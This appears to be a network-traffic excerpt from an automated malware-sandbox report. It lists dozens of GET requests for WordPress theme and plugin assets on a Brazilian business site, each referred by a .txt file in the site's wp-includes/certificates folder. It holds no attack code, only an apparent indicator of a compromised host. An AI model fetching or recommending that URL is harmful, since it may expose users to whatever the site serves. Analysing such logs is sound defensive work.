Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/css/banner-rotator.css?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/css/caption.css?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/lib/owl/assets/owl.carousel.min.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets//lib/owl/assets/owl.theme.default.min.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/lib/animate/animate-logo.css?ver=20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/css/logo-slider-wp-public.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/main-style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.8 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/motopress-content-editor/bootstrap/bootstrap-grid.min.css?ver=1.5.8 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.theme.css?ver=1.24 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/elasti-carousel/jquery.elastislide.js?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/js/jquery.flashblue-plugins.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/lib/owl/owl.carousel.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/css/style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/swfobject.js?ver=2.2-20120417 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.js HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/custom.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/flags/16/pt-br.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/chart.min.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/images/content_bg4.jpg HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/switcher.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/arrow_down.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquery.flexslider-min.js?ver=2.2.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/images/up-arrow.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/custom-script.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
